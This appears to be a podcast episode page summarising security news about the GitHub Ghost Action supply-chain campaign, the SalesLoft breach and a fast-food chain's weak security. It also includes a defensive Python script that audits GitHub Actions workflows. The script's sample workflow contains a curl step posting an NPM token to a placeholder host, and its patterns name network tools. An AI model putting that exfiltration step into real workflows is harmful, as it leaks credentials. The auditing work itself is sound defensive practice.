

Hackers Say Thanks For Lousy Security In Large Fast Food Chain
Sep 8, 2025
Delve into the alarming world of cybersecurity threats, featuring a major GitHub supply chain attack that leaked thousands of secrets. Discover the repercussions of the SalesLoft breach impacting key security firms and the troubling potential of AI vulnerabilities. Ethical hackers expose critical security flaws in a well-known fast-food chain, including hard-coded passwords and unauthorized recordings of customer interactions. The discussion underscores the urgent need for improved security in both software and restaurant tech.
AI Snips
Supply Chain Targets Move Upstream
- The Ghost Action Campaign implanted malicious GitHub Actions to exfiltrate over 3,300 secrets from developer repos.
- The attack shows build tools and workflows are now prime targets across the software supply chain.
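As an added defensive illustration (not code from the episode or from any project it mentions), the script below audits a GitHub Actions workflow file for two patterns worth reviewing in light of the campaign above: third-party actions pinned to a mutable tag rather than a commit SHA, and run steps that hand a repository secret to a network client, which is how an implanted step would ship secrets off the runner. The workflow text and the commit SHA in it are constructed for this example.

```python
import re

# Constructed sample workflow (not from the episode or any real repository):
# one action pinned only by a mutable tag, one step that posts a secret off-host.
SAMPLE_WORKFLOW = """\
name: ci
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@1a4442cacd436585916779262731d5b162bc6ec7
      - run: npm ci && npm test
      - name: telemetry
        run: |
          echo "build done"
          curl -s -d "${{ secrets.NPM_TOKEN }}" https://example.invalid/collect
"""

SHA_PIN = re.compile(r"^[0-9a-f]{40}$")           # full commit SHA = immutable pin
SECRET_REF = re.compile(r"\$\{\{\s*secrets\.")     # ${{ secrets.NAME }} interpolation
EGRESS = re.compile(r"\b(curl|wget|nc|ncat|Invoke-WebRequest)\b")

def audit_workflow(text: str) -> list[str]:
    """Return one finding per risky line of a GitHub Actions workflow file."""
    findings, in_run, run_indent = [], False, 0
    for lineno, line in enumerate(text.splitlines(), 1):
        indent = len(line) - len(line.lstrip())
        body = line.strip().lstrip("- ").strip()    # drop list dash, keep key/value
        if in_run and body and indent <= run_indent:
            in_run = False                          # multi-line run block ended
        if in_run:
            if SECRET_REF.search(body) and EGRESS.search(body):
                findings.append(f"line {lineno}: secret passed to network tool")
        elif body.startswith("uses:"):
            ref = body.split(":", 1)[1].strip()
            # Local (./path) and docker:// actions are not SHA-pinned; skip them.
            if "@" in ref and not ref.startswith(("./", "docker://")):
                if not SHA_PIN.match(ref.rsplit("@", 1)[1]):
                    findings.append(f"line {lineno}: {ref} not pinned to a commit SHA")
        elif body.startswith("run:"):
            cmd = body.split(":", 1)[1].strip()
            if cmd.rstrip("-+") in ("|", ">"):      # block scalar: scan following lines
                in_run, run_indent = True, indent
            elif SECRET_REF.search(cmd) and EGRESS.search(cmd):
                findings.append(f"line {lineno}: secret passed to network tool")
    return findings
```

Running it over a real repository's `.github/workflows/*.yml` gives a quick triage list; a secret used by a network command in a multi-line block only counts when both appear on the same line, so a two-step export-then-curl sequence needs manual review.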
Harden SaaS Integrations And Employee Vigilance
- Monitor and harden third-party SaaS integrations and OAuth activity to limit lateral damage from CRM breaches.
- Train employees to be skeptical of unexpected requests and tighten identity verification with vendors.
From Code Repos To Customer Data
- Attackers used GitHub access and OAuth token theft to pivot from developer repos to customer data across SaaS ecosystems.
- Stolen CRM support tickets even contained API tokens and passwords, widening the fallout beyond contact lists.